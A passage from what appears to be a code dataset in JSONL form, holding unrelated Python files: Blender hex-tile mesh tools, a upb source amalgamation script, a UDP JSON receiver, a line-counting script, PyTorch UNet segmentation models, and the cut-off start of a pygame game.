ncverts.append(cvert)\n for bvert in bverts:\n if bvert in nset:\n nbverts.append(bvert)\n out.append(HexNode(obj, node, nbverts, ncverts))\n if only_one:\n return out\n return out\n\nclass HexMove(bpy.types.Operator):\n bl_idname = \"object.hex_move\"\n bl_label = \"Hex move\"\n bl_options = {'REGISTER', 'UNDO'}\n \n x = bpy.props.IntProperty(name=\"x\", default=0, min=-100, max=100)\n y = bpy.props.IntProperty(name=\"y\", default=0, min=-100, max=100)\n\n def execute(self, context):\n mat = bpy.context.region_data.view_rotation.to_matrix()\n vec_right = mat * Vector((1, 0, 0))\n vec_up = mat * Vector((0, 1, 0))\n\n if abs(vec_right[0]) > abs(vec_right[1]):\n vec_right[0] = math.copysign(1.0, vec_right[0])\n vec_right[1] = 0\n vec_up[0] = 0\n vec_up[1] = math.copysign(1.0, vec_up[1])\n else:\n vec_right[0] = 0\n vec_right[1] = math.copysign(1.0, vec_right[1])\n vec_up[0] = math.copysign(1.0, vec_up[0])\n vec_up[1] = 0\n vec = (vec_right[0] * self.x + vec_up[0] * self.y, vec_right[1] * self.x + vec_up[1] * self.y)\n for obj in bpy.context.selected_objects:\n #print(\"Moving from: \" + str(hexPos(obj.location)) + \" To: \" + str(hexPos(obj.location + hexVector(self.x, self.y))))\n obj.location += hexVector(vec[0], vec[1])\n return {'FINISHED'}\n\nclass HexSplit(bpy.types.Operator):\n bl_idname = \"object.hex_split\"\n bl_label = \"Hex split\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def fixHexLocation(self, obj):\n if len(obj.data.vertices) == 0:\n return\n (vmin, vmax) = boundingBox([v.co for v in obj.data.vertices])\n center = (vmin + vmax) * 0.5\n hex_pos = hexPos(center + obj.location)\n new_origin = hexVector(hex_pos[0], hex_pos[1]) - obj.location\n for vert in obj.data.vertices:\n vert.co -= new_origin\n obj.location += new_origin\n\n def extractPatch(self, obj, bverts, cverts):\n bvert_set = set(bverts)\n verts = obj.data.vertices\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n sel = [False] * len(verts)\n\n for iv in range(0, len(verts)):\n node = []\n vis = [False] * len(verts)\n if sel[iv] or iv in bvert_set:\n continue\n neighs = [iv]\n while len(neighs) > 0:\n v = neighs.pop(-1)\n if sel[v]:\n continue\n if not vis[v]:\n node.append(v)\n vis[v] = True\n if not v in bvert_set:\n sel[v] = True\n neighs += edge_map[v]\n\n if len(node) > 0:\n return node\n return []\n\n def execute(self, context):\n if len(bpy.context.selected_objects) != 1:\n raise Exception(\"Exactly one object must be selected\")\n\n obj = bpy.context.active_object\n old_objects = set(bpy.data.objects)\n \n while True:\n (bverts, cverts) = borderVerts(obj)\n patch = self.extractPatch(obj, bverts, cverts)\n if len(patch) == 0 or len(patch) == len(obj.data.vertices):\n break\n selectVerts(obj, patch)\n bpy.ops.object.editmode_toggle()\n bpy.ops.mesh.separate()\n bpy.ops.object.editmode_toggle()\n\n self.fixHexLocation(obj)\n for obj in bpy.data.objects:\n if not obj in old_objects:\n self.fixHexLocation(obj)\n return {'FINISHED'}\n\nclass HexJoin(bpy.types.Operator):\n bl_idname = \"object.hex_join\"\n bl_label = \"Hex join\"\n bl_options ={'REGISTER', 'UNDO'}\n\n max_dist = bpy.props.FloatProperty(name=\"max_dist\", default=0.5, min=0.00001, max=10.0)\n\n # returns pair: (min dist, bool whether edge order should be swapped)\n def edgeDist(self, obj, edge1, edge2):\n if len(edge1) != len(edge2):\n return None\n dist1 = 0.0\n dist2 = 0.0\n overts = obj.data.vertices\n count = len(edge1)\n for i in range(0, count - 1):\n dist1 += (overts[edge1[i]].co - overts[edge2[i]].co).length\n dist2 += (overts[edge1[i]].co - overts[edge2[count - i - 1]].co).length\n dist1 /= float(count)\n dist2 /= float(count)\n return (min(dist1, dist2), dist1 > dist2)\n\n def mergeVerts(self, obj, merge_dict):\n bm = bmesh.from_edit_mesh(obj.data)\n bm.verts.ensure_lookup_table()\n\n merge_map = {}\n while len(merge_dict) > 0:\n item = merge_dict.popitem()\n merge = [item[0]]\n merge += item[1]\n todo = item[1]\n while len(todo) > 0:\n tnode = todo.pop(-1)\n item = merge_dict.pop(tnode, [])\n for node in item:\n if not node in merge:\n todo.append(node)\n merge.append(node)\n merge_set = set(merge)\n merge = [e for e in merge_set]\n for i in range(0, len(merge) - 1):\n merge_map[bm.verts[merge[i]]] = bm.verts[merge[-1]]\n bmesh.ops.weld_verts(bm, targetmap=merge_map)\n\n bmesh.update_edit_mesh(obj.data)\n bpy.ops.object.editmode_toggle()\n\n def execute(self, context):\n bpy.ops.object.join()\n obj = bpy.context.active_object\n\n (bverts, cverts) = borderVerts(obj)\n bedge_map = edgesMap(obj, bverts)\n all_edges = hexEdges(obj, cverts, bedge_map)\n #TODO: group into separate segments\n\n pairs = []\n for e1 in range(0, len(all_edges)):\n for e2 in range(e1 + 1, len(all_edges)):\n result = self.edgeDist(obj, all_edges[e1], all_edges[e2])\n if result != None and result[0] < self.max_dist:\n pairs.append((result[0], result[1], e1, e2))\n pairs.sort()\n\n merge_dict = defaultdict(list)\n for pair in pairs:\n e1 = all_edges[pair[2]]\n e2 = all_edges[pair[3]]\n\n for i in range(0, len(e1)):\n v1 = e1[i]\n v2 = e2[len(e1) - i - 1 if pair[1] else i]\n merge_dict[v1].append(v2)\n merge_dict[v2].append(v1)\n bpy.ops.object.editmode_toggle()\n self.mergeVerts(obj, merge_dict)\n\n return {'FINISHED'}\n\nclass HexDuplicate(bpy.types.Operator):\n bl_idname = \"object.hex_duplicate\"\n bl_label = \"Hex duplicate\"\n bl_options = {'REGISTER', 'UNDO'}\n \n def execute(self, context):\n objs = bpy.context.selected_objects\n if len(objs) != 1:\n raise Exception(\"Exactly one object must be selected\")\n obj = objs[0]\n\n moves = [ (1, 0), (-1, 0), (0, 1), (0, -1), (-1, 1), (1, -1) ]\n for move in moves:\n obj.select = True\n bpy.ops.object.duplicate()\n cur = bpy.context.selected_objects[0]\n cur.location += hexVector(move[0], move[1])\n cur.select = False\n return {'FINISHED'}\n\n\nclass HexFix(bpy.types.Operator):\n bl_idname = \"object.hex_fix\"\n bl_label = \"Hex fix\"\n bl_options ={'REGISTER', 'UNDO'}\n\n #TODO: make this tool more useful\n def fix(self, obj):\n mesh = obj.data\n\n (bverts, cverts) = borderVerts(obj)\n hnodes = hexNodes(obj, bverts, cverts)\n for hnode in hnodes:\n for side in range(0, 6):\n edge = hnode.edges[side]\n vec = hexVector(hnode.pos[0], hnode.pos[1]) - obj.location\n start = hex_verts[side] + vec\n end = hex_verts[(side + 1) % 6] + vec\n\n count = len(edge)\n for j in range(0, count):\n blend = start + (end - start) * (j / float(count - 1))\n vert = mesh.vertices[edge[j]]\n vert.co[0] = blend[0]\n vert.co[1] = blend[1]\n\n def execute(self, context):\n for obj in bpy.context.selected_objects:\n self.fix(obj)\n return {'FINISHED'}\n\n#TODO: doesn't work well for complicated topologies\nclass HexCopy(bpy.types.Operator):\n bl_idname = \"object.hex_copy\"\n bl_label = \"Hex copy\"\n bl_options ={'REGISTER', 'UNDO'}\n \n src_side = bpy.props.IntProperty(name=\"src_side\", default=0, min=0, max=5)\n dst_side = bpy.props.IntProperty(name=\"dst_side\", default=0, min=0, max=5)\n num_lines = bpy.props.IntProperty(name=\"num_lines\", default=5, min=1, max=100)\n mirror = bpy.props.BoolProperty(name=\"mirror\", default=False)\n\n # returns lists of references to vertices\n def getLines(self, obj, side):\n (bverts, cverts) = borderVerts(obj)\n hnodes = hexNodes(obj, bverts, cverts)\n assert(len(hnodes) == 1)\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n edges = hnodes[0].edges\n\n out = []\n overts = obj.data.vertices\n num_lines = min(len(edges[0]), self.num_lines)\n for i in range(0, num_lines):\n path = shortestPath(obj, edges[(side + 1) % 6][i], edges[(side + 5) % 6][-(i + 1)], edge_map)\n out.append([overts[vert] for vert in path])\n return out\n\n\n def execute(self, context):\n src_obj = bpy.context.active_object\n dst_objs = [src_obj]\n if len(bpy.context.selected_objects) > 1:\n dst_objs = bpy.context.selected_objects.copy()\n dst_objs.remove(src_obj)\n\n src_lines = self.getLines(src_obj, self.src_side)\n dst_liness = []\n num_lines = len(src_lines)\n for i in range(0, len(dst_objs)):\n dst_lines = self.getLines(dst_objs[i], self.dst_side)\n dst_liness.append(dst_lines)\n assert(num_lines == len(dst_lines))\n for l in range(0, num_lines):\n if len(src_lines[l]) != len(dst_lines[l]):\n print(\"Hex nodes have incompatible topologies\")\n print(\"Line lengths: \" + str(len(src_lines[l])) + \" \" + str(len(dst_lines[l])))\n return {'FINISHED'}\n\n for dst_lines in dst_liness:\n for l in range(0, num_lines):\n blend = float(num_lines - l) / float(num_lines)\n line_len = len(src_lines[l])\n\n for j in range(0, line_len):\n sj = line_len - j - 1 if self.mirror else j\n dst_lines[l][j].co[2] += (src_lines[l][sj].co[2] - dst_lines[l][j].co[2]) * blend\n return {'FINISHED'}\n\n\nclass HexSymmetrizeNeighbours(bpy.types.Operator):\n bl_idname = \"object.hex_symmetrize_neighbours\"\n bl_label = \"Hex symmetrize neighbours\"\n bl_options ={'REGISTER', 'UNDO'}\n\n def execute(self, context):\n objs = bpy.context.selected_objects\n if len(objs) != 2:\n raise Exception(\"You must select exactly 2 hexes\")\n (bverts1, cverts1) = borderVerts(objs[0])\n (bverts2, cverts2) = borderVerts(objs[1])\n hnodes1 = hexNodes(objs[0], bverts1, cverts1)\n hnodes2 = hexNodes(objs[1], bverts2, cverts2)\n\n assert(len(hnodes1) == 1 and len(hnodes2) == 1)\n hex_dir = whichHexDirection(hnodes1[0].pos, hnodes2[0].pos)\n if hex_dir == -1:\n raise Exception(\"Selected objects must be neighbours\")\n\n overts1 = objs[0].data.vertices\n overts2 = objs[1].data.vertices\n edge_map1 = edgesMap(objs[0], range(0, len(objs[0].data.vertices)))\n edge_map2 = edgesMap(objs[1], range(0, len(objs[1].data.vertices)))\n edges1 = hnodes1[0].edges\n edges2 = hnodes2[0].edges\n edst1 = (edges1[(hex_dir + 2) % 6], edges1[(hex_dir + 4) % 6])\n esrc1 = (edges2[(hex_dir + 2) % 6], edges2[(hex_dir + 4) % 6])\n edst2 = (edges2[(hex_dir + 1) % 6], edges2[(hex_dir + 5) % 6])\n esrc2 = (edges1[(hex_dir + 1) % 6], edges1[(hex_dir + 5) % 6])\n elen = len(edst1[0])\n\n for i in range(0, elen):\n p1dst = shortestPath(objs[0], edst1[0][i], edst1[1][-(i + 1)], edge_map1)\n p1src = shortestPath(objs[1], esrc1[0][i], esrc1[1][-(i + 1)], edge_map2)\n p2dst = shortestPath(objs[1], edst2[0][i], edst2[1][-(i + 1)], edge_map2)\n p2src = shortestPath(objs[0], esrc2[0][i], esrc2[1][-(i + 1)], edge_map1)\n assert(len(p1src) == len(p1dst))\n assert(len(p2src) == len(p2dst))\n for j in range(0, len(p1src)):\n overts1[p1dst[j]].co = overts2[p1src[j]].co\n for j in range(0, len(p2src)):\n overts2[p2dst[j]].co = overts1[p2src[j]].co\n\n return {'FINISHED'}\n\nclass HexSymmetrize(bpy.types.Operator):\n bl_idname = \"object.hex_symmetrize\"\n bl_label = \"Hex symmetrize\"\n bl_options ={'REGISTER', 'UNDO'}\n \n num_lines = bpy.props.IntProperty(name=\"num_lines\", default=5, min=1, max=100)\n\n def execute(self, context):\n obj = bpy.context.active_object\n (bverts, cverts) = borderVerts(obj)\n hnodes = hexNodes(obj, bverts, cverts)\n assert(len(hnodes) == 1)\n\n overts = obj.data.vertices\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n edges = hnodes[0].edges\n num_lines = min(len(edges[0]), self.num_lines)\n\n for i in range(0, num_lines):\n psrc = shortestPath(obj, edges[1][i], edges[5][-(i + 1)], edge_map)\n plen = len(psrc)\n blend = float(num_lines - i) / float(num_lines)\n\n height_map = [0.0] * plen\n for j in range(0, plen):\n height_map[j] = (overts[psrc[j]].co[2] + overts[psrc[plen - j - 1]].co[2]) * 0.5\n\n for hex_dir in range(0, 6):\n pdst = shortestPath(obj, edges[(hex_dir + 1) % 6][i], edges[(hex_dir + 5) % 6][-(i + 1)], edge_map)\n assert(len(pdst) == plen)\n for j in range(0, plen):\n overts[pdst[j]].co[2] += (height_map[j] - overts[pdst[j]].co[2]) * blend\n\n return {'FINISHED'}\n\nclass HexMakeGroup(bpy.types.Operator):\n bl_idname = \"object.hex_make_group\"\n bl_label = \"Hex make group\"\n bl_options ={'REGISTER', 'UNDO'}\n\n def execute(self, context):\n obj = bpy.context.active_object\n cur_group = None\n for group in bpy.data.groups:\n if obj.name in group.objects and len(group.objects) == 1:\n cur_group = group\n break\n if cur_group != None:\n bpy.data.groups.remove(cur_group)\n\n cur_group = bpy.data.groups.new(obj.name)\n cur_group.objects.link(obj)\n cur_group.dupli_offset = obj.location\n return {'FINISHED'}\n\ndef objectMenuFunc(self, context):\n self.layout.operator(HexDuplicate.bl_idname)\n self.layout.operator(HexJoin.bl_idname)\n self.layout.operator(HexSplit.bl_idname)\n self.layout.operator(HexCopy.bl_idname)\n\ndef registerKey(key, clazz, obj_km, sculpt_km=None, oskey=True):\n k1 = obj_km.keymap_items.new(clazz.bl_idname, key, 'PRESS', oskey=oskey)\n if sculpt_km != None:\n k2 = sculpt_km.keymap_items.new(clazz.bl_idname, key, 'PRESS', oskey=oskey)\n return [k1, k2]\n return k1\n\ndef register():\n bpy.utils.register_class(HexDuplicate)\n bpy.utils.register_class(HexFix)\n bpy.utils.register_class(HexMove)\n bpy.utils.register_class(HexSplit)\n bpy.utils.register_class(HexJoin)\n bpy.utils.register_class(HexSymmetrize)\n bpy.utils.register_class(HexCopy)\n bpy.utils.register_class(HexMakeGroup)\n\n bpy.types.VIEW3D_MT_object.append(objectMenuFunc)\n\n wm = bpy.context.window_manager\n obj_km = wm.keyconfigs.addon.keymaps.new(name='Object Mode', space_type='EMPTY')\n sculpt_km = wm.keyconfigs.addon.keymaps.new(name='Sculpt', space_type='EMPTY')\n\n registerKey('F', HexFix, obj_km, sculpt_km)\n registerKey('R', HexSymmetrize, obj_km, sculpt_km)\n registerKey('C', HexCopy, obj_km, sculpt_km)\n\n registerKey('D', HexDuplicate, obj_km)\n registerKey('S', HexSplit, obj_km)\n registerKey('J', HexJoin, obj_km)\n registerKey('G', HexMakeGroup, obj_km)\n\n km_right = registerKey('RIGHT_ARROW', HexMove, obj_km, oskey=False)\n km_left = registerKey('LEFT_ARROW', HexMove, obj_km, oskey=False)\n km_up = registerKey('UP_ARROW', HexMove, obj_km, oskey=False)\n km_down = registerKey('DOWN_ARROW', HexMove, obj_km, oskey=False)\n\n km_right.properties.x = 1\n km_right.properties.y = 0\n km_left.properties.x = -1\n km_left.properties.y = 0\n km_up.properties.x = 0\n km_up.properties.y = 1\n km_down.properties.x = 0\n km_down.properties.y = -1\n\nif __name__ == \"__main__\":\n register()\n","sub_path":"data/frontier_tools.py","file_name":"frontier_tools.py","file_ext":"py","file_size_in_byte":25091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"248888091","text":"#!/usr/bin/python\n\nimport sys\nimport re\nimport os\n\nINCLUDE_RE = re.compile('^#include \"([^\"]*)\"$')\n\ndef parse_include(line):\n match = INCLUDE_RE.match(line)\n return match.groups()[0] if match else None\n\nclass Amalgamator:\n def __init__(self, output_path):\n self.include_paths = [\".\"]\n self.included = set([\"upb/port_def.inc\", \"upb/port_undef.inc\"])\n self.output_h = open(output_path + \"upb.h\", \"w\")\n self.output_c = open(output_path + \"upb.c\", \"w\")\n\n self.output_c.write(\"/* Amalgamated source file */\\n\")\n self.output_c.write('#include \"upb.h\"\\n')\n self.output_c.write(open(\"upb/port_def.inc\").read())\n\n self.output_h.write(\"/* Amalgamated source file */\\n\")\n self.output_h.write('#include ')\n self.output_h.write(open(\"upb/port_def.inc\").read())\n\n def add_include_path(self, path):\n self.include_paths.append(path)\n\n def finish(self):\n self.output_c.write(open(\"upb/port_undef.inc\").read())\n self.output_h.write(open(\"upb/port_undef.inc\").read())\n\n def _process_file(self, infile_name, outfile):\n file = None\n for path in self.include_paths:\n try:\n full_path = os.path.join(path, infile_name)\n file = open(full_path)\n break\n except IOError:\n pass\n if not file:\n raise RuntimeError(\"Couldn't open file \" + infile_name)\n\n for line in file:\n include = parse_include(line)\n if include is not None and (include.startswith(\"upb\") or\n include.startswith(\"google\")):\n if include not in self.included:\n self.included.add(include)\n self._add_header(include)\n else:\n outfile.write(line)\n\n def _add_header(self, filename):\n self._process_file(filename, self.output_h)\n\n def add_src(self, filename):\n self._process_file(filename, self.output_c)\n\n# ---- main ----\n\noutput_path = sys.argv[1]\namalgamator = Amalgamator(output_path)\nfiles = []\n\nfor arg in sys.argv[2:]:\n arg = arg.strip()\n if arg.startswith(\"-I\"):\n amalgamator.add_include_path(arg[2:])\n elif arg.endswith(\".h\") or arg.endswith(\".inc\"):\n pass\n else:\n files.append(arg)\n\nfor filename in files:\n amalgamator.add_src(filename)\n\namalgamator.finish()\n","sub_path":"MY_REPOS/misc-experiments/_FIREBFIRE/grpc-SwiftPM/third_party/upb/tools/amalgamate.py","file_name":"amalgamate.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"468874557","text":"import json\nimport socket, sys, time\n\ntextport = sys.argv[1]\n\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nport = int(textport)\nserver_address = ('localhost', port)\ns.bind(server_address)\n\nfor i in range(0,10):\n buf, address = s.recvfrom(port)\n if not len(buf):\n break\n x = json.loads(buf.decode('utf-8'))\n print(x)\n\n","sub_path":"SYSC3010 Lab 4/JSONreceiver.py","file_name":"JSONreceiver.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"191294553","text":"'''\nN0.0007 有个目录,里面是你自己写过的程序,统计一下你写过多少行代码。包括空行和注释,但是要分别列出来。\n'''\n\n#!usr/bin/env python\n \nimport os\n\n\n'''\n 遍历文件目录,返回文件路径列表\n'''\ndef walk_dir(path):\n file_path = []\n for root, dirs, files in os.walk(path):\n for f in files:\n if f.lower().endswith('py'):\n file_path.append(os.path.join(root, f))\n return file_path\n\n'''\n 统计代码、注释及空行行数\n''' \ndef codes_stat(file_path):\n file_name = os.path.basename(file_path)\n note_flag = False\n line_num = 0\n empty_line_num = 0\n note_num = 0\n\n with open(file_path) as f:\n # for line in f.read().split('\\n'):\n for line in f:\n\n line_num += 1\n if line.strip().startswith('\\\"\\\"\\\"') and not note_flag:\n note_flag =True\n note_num += 1\n continue\n\n if line.strip().startswith('\\\"\\\"\\\"'):\n note_flag = False\n note_num += 1\n\n if line.strip().startswith('#') or note_flag:\n note_num += 1\n\n if len(line) == 0:\n empty_line_num += 1\n print (\"在%s中,共有%s行代码,其中有%s空行,有%s注释\"% (file_name, line_num, empty_line_num, note_num))\n\n\nif __name__ == '__main__':\n file_path=walk_dir('/media/mingrui/H/Python/Practice')\n for item in file_path:\n codes_stat(item) \n","sub_path":"0007/0007.py","file_name":"0007.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"278718920","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torchvision\nfrom torchvision import models\n\n\ndef conv3x3(in_ch, out_ch):\n return nn.Conv2d(in_ch, out_ch, kernel_size=3, padding=1, dilation=1)\n\n\nclass ConvRelu(nn.Module):\n def __init__(self, in_ch, out_ch):\n super().__init__()\n self.conv = conv3x3(in_ch, out_ch)\n self.activation = nn.ReLU(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.activation(x)\n return x\n\n\nclass Interpolate(nn.Module):\n def __init__(self, size=None, scale_factor=None, mode='nearest', align_corners=False):\n super().__init__()\n self.interp = F.interpolate\n self.size = size\n self.mode = mode\n self.scale_factor = scale_factor\n self.align_corners = align_corners\n\n self.kwargs = dict(size=self.size, scale_factor=self.scale_factor, mode=self.mode)\n if self.mode != 'nearest':\n self.kwargs['align_corners'] = self.align_corners\n\n def forward(self, x):\n x = self.interp(x, **self.kwargs)\n return x\n\n\nclass DecoderBlock(nn.Module):\n def __init__(self, in_ch, mid_ch, out_ch, upsampling=False):\n super().__init__()\n self.in_ch = in_ch\n\n if not upsampling:\n self.block = nn.Sequential(\n ConvRelu(in_ch, mid_ch),\n nn.ConvTranspose2d(mid_ch, out_ch, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.ReLU(inplace=True)\n )\n else:\n self.block = nn.Sequential(\n # Interpolate(scale_factor=2, mode='bilinear'),\n Interpolate(scale_factor=2, mode='nearest'),\n ConvRelu(in_ch, mid_ch),\n ConvRelu(mid_ch, out_ch)\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass UNet11(nn.Module):\n def __init__(self, num_filters=32, pretrained=True):\n super().__init__()\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n self.relu = nn.ReLU(inplace=True)\n\n encoder = models.vgg11(pretrained=pretrained).features\n\n self.conv1 = encoder[0] # 3 -> 64\n self.conv2 = encoder[3] # 64 -> 128\n self.conv3_1 = encoder[6] # 128 -> 256\n self.conv3_2 = encoder[8] # 256 -> 256\n self.conv4_1 = encoder[11] # 256 -> 512\n self.conv4_2 = encoder[13] # 512 -> 512\n self.conv5_1 = encoder[16] # 512 -> 512\n self.conv5_2 = encoder[18] # 512 -> 512\n\n self.center = DecoderBlock(num_filters * 16, num_filters * 16, num_filters * 8, upsampling=True)\n\n self.dec5 = DecoderBlock(num_filters * (8 + 16), num_filters * 16, num_filters * 8, upsampling=True)\n self.dec4 = DecoderBlock(num_filters * (8 + 16), num_filters * 16, num_filters * 4, upsampling=True)\n self.dec3 = DecoderBlock(num_filters * (4 + 8), num_filters * 8, num_filters * 2, upsampling=True)\n self.dec2 = DecoderBlock(num_filters * (2 + 4), num_filters * 4, num_filters, upsampling=True)\n self.dec1 = ConvRelu(num_filters * (1 + 2), num_filters)\n\n self.final = nn.Conv2d(num_filters, 1, kernel_size=1)\n\n def forward(self, x):\n conv1 = self.relu(self.conv1(x))\n conv2 = self.relu(self.conv2(self.pool(conv1)))\n conv3_1 = self.relu(self.conv3_1(self.pool(conv2)))\n conv3_2 = self.relu(self.conv3_2(conv3_1))\n conv4_1 = self.relu(self.conv4_1(self.pool(conv3_2)))\n conv4_2 = self.relu(self.conv4_2(conv4_1))\n conv5_1 = self.relu(self.conv5_1(self.pool(conv4_2)))\n conv5_2 = self.relu(self.conv5_2(conv5_1))\n\n center = self.center(self.pool(conv5_2))\n\n dec5 = self.dec5(torch.cat([center, conv5_2], dim=1))\n dec4 = self.dec4(torch.cat([dec5, conv4_2], dim=1))\n dec3 = self.dec3(torch.cat([dec4, conv3_2], dim=1))\n dec2 = self.dec2(torch.cat([dec3, conv2], dim=1))\n dec1 = self.dec1(torch.cat([dec2, conv1], dim=1))\n\n return self.final(dec1)\n\n\nclass DecoderBlockV2(nn.Module):\n def __init__(self, in_channels, middle_channels, out_channels, is_deconv=True):\n super(DecoderBlockV2, self).__init__()\n self.in_channels = in_channels\n\n if is_deconv:\n \"\"\"\n Paramaters for Deconvolution were chosen to avoid artifacts, following\n link https://distill.pub/2016/deconv-checkerboard/\n \"\"\"\n\n self.block = nn.Sequential(\n ConvRelu(in_channels, middle_channels),\n nn.ConvTranspose2d(middle_channels, out_channels, kernel_size=4, stride=2,\n padding=1),\n nn.ReLU(inplace=True)\n )\n else:\n self.block = nn.Sequential(\n Interpolate(scale_factor=2, mode='nearest'),\n ConvRelu(in_channels, middle_channels),\n ConvRelu(middle_channels, out_channels),\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass AlbuNet(nn.Module):\n \"\"\"\n UNet (https://arxiv.org/abs/1505.04597) with Resnet34(https://arxiv.org/abs/1512.03385) encoder\n Proposed by Alexander Buslaev: https://www.linkedin.com/in/al-buslaev/\n \"\"\"\n\n def __init__(self, num_classes=1, num_filters=32, pretrained=False, is_deconv=False):\n \"\"\"\n :param num_classes:\n :param num_filters:\n :param pretrained:\n False - no pre-trained network is used\n True - encoder is pre-trained with resnet34\n :is_deconv:\n False: bilinear interpolation is used in decoder\n True: deconvolution is used in decoder\n \"\"\"\n super().__init__()\n self.num_classes = num_classes\n\n self.pool = nn.MaxPool2d(2, 2)\n\n self.encoder = torchvision.models.resnet34(pretrained=pretrained)\n\n self.relu = nn.ReLU(inplace=True)\n\n self.conv1 = nn.Sequential(self.encoder.conv1,\n self.encoder.bn1,\n self.encoder.relu,\n self.pool)\n\n self.conv2 = self.encoder.layer1\n\n self.conv3 = self.encoder.layer2\n\n self.conv4 = self.encoder.layer3\n\n self.conv5 = self.encoder.layer4\n\n self.center = DecoderBlockV2(512, num_filters * 8 * 2, num_filters * 8, is_deconv)\n\n self.dec5 = DecoderBlockV2(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec4 = DecoderBlockV2(256 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec3 = DecoderBlockV2(128 + num_filters * 8, num_filters * 4 * 2, num_filters * 2, is_deconv)\n self.dec2 = DecoderBlockV2(64 + num_filters * 2, num_filters * 2 * 2, num_filters * 2 * 2, is_deconv)\n self.dec1 = DecoderBlockV2(num_filters * 2 * 2, num_filters * 2 * 2, num_filters, is_deconv)\n self.dec0 = ConvRelu(num_filters, num_filters)\n self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)\n\n def forward(self, x):\n conv1 = self.conv1(x)\n conv2 = self.conv2(conv1)\n conv3 = self.conv3(conv2)\n conv4 = self.conv4(conv3)\n conv5 = self.conv5(conv4)\n\n center = self.center(self.pool(conv5))\n\n dec5 = self.dec5(torch.cat([center, conv5], 1))\n\n dec4 = self.dec4(torch.cat([dec5, conv4], 1))\n dec3 = self.dec3(torch.cat([dec4, conv3], 1))\n dec2 = self.dec2(torch.cat([dec3, conv2], 1))\n dec1 = self.dec1(dec2)\n dec0 = self.dec0(dec1)\n\n if self.num_classes > 1:\n x_out = F.log_softmax(self.final(dec0), dim=1)\n else:\n x_out = self.final(dec0)\n\n return x_out\n\n\nclass UNet16(nn.Module):\n def __init__(self, num_classes=1, num_filters=32, pretrained=False, is_deconv=False):\n \"\"\"\n :param num_classes:\n :param num_filters:\n :param pretrained:\n False - no pre-trained network used\n True - encoder pre-trained with VGG16\n :is_deconv:\n False: bilinear interpolation is used in decoder\n True: deconvolution is used in decoder\n \"\"\"\n super().__init__()\n self.num_classes = num_classes\n\n self.pool = nn.MaxPool2d(2, 2)\n\n self.encoder = torchvision.models.vgg16(pretrained=pretrained).features\n\n self.relu = nn.ReLU(inplace=True)\n\n self.conv1 = nn.Sequential(self.encoder[0],\n self.relu,\n self.encoder[2],\n self.relu)\n\n self.conv2 = nn.Sequential(self.encoder[5],\n self.relu,\n self.encoder[7],\n self.relu)\n\n self.conv3 = nn.Sequential(self.encoder[10],\n self.relu,\n self.encoder[12],\n self.relu,\n self.encoder[14],\n self.relu)\n\n self.conv4 = nn.Sequential(self.encoder[17],\n self.relu,\n self.encoder[19],\n self.relu,\n self.encoder[21],\n self.relu)\n\n self.conv5 = nn.Sequential(self.encoder[24],\n self.relu,\n self.encoder[26],\n self.relu,\n self.encoder[28],\n self.relu)\n\n self.center = DecoderBlockV2(512, num_filters * 8 * 2, num_filters * 8, is_deconv)\n\n self.dec5 = DecoderBlockV2(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec4 = DecoderBlockV2(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec3 = DecoderBlockV2(256 + num_filters * 8, num_filters * 4 * 2, num_filters * 2, is_deconv)\n self.dec2 = DecoderBlockV2(128 + num_filters * 2, num_filters * 2 * 2, num_filters, is_deconv)\n self.dec1 = ConvRelu(64 + num_filters, num_filters)\n self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)\n\n def forward(self, x):\n conv1 = self.conv1(x)\n conv2 = self.conv2(self.pool(conv1))\n conv3 = self.conv3(self.pool(conv2))\n conv4 = self.conv4(self.pool(conv3))\n conv5 = self.conv5(self.pool(conv4))\n\n center = self.center(self.pool(conv5))\n\n dec5 = self.dec5(torch.cat([center, conv5], 1))\n\n dec4 = self.dec4(torch.cat([dec5, conv4], 1))\n dec3 = self.dec3(torch.cat([dec4, conv3], 1))\n dec2 = self.dec2(torch.cat([dec3, conv2], 1))\n dec1 = self.dec1(torch.cat([dec2, conv1], 1))\n\n if self.num_classes > 1:\n x_out = F.log_softmax(self.final(dec1), dim=1)\n else:\n x_out = self.final(dec1)\n\n return x_out","sub_path":"src/am/segment/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"555420460","text":"# Import random module\n# Import pygame library and initialise it\nimport random\nimport pygame\npygame.init()\n\n# Create variables for basic colours\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\n\n# Store values for screen width and length in variables \"screen_width\" and \"screen_length\" respectively\nscreen_width = 1040\nscreen_height = 680\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n# Set an icon and caption for the screen\nicon = pygame.image.load(\"superhero.png\")\npygame.display.set_icon(icon)\npygame.display.set_caption(\"Save The Baby!\")\n\n# Load the hero image\nhero = pygame.image.load(\"superhero.png\")\n\n# Load all alien images\nalien = pygame.image.load(\"alien1.png\")\nalien2 = 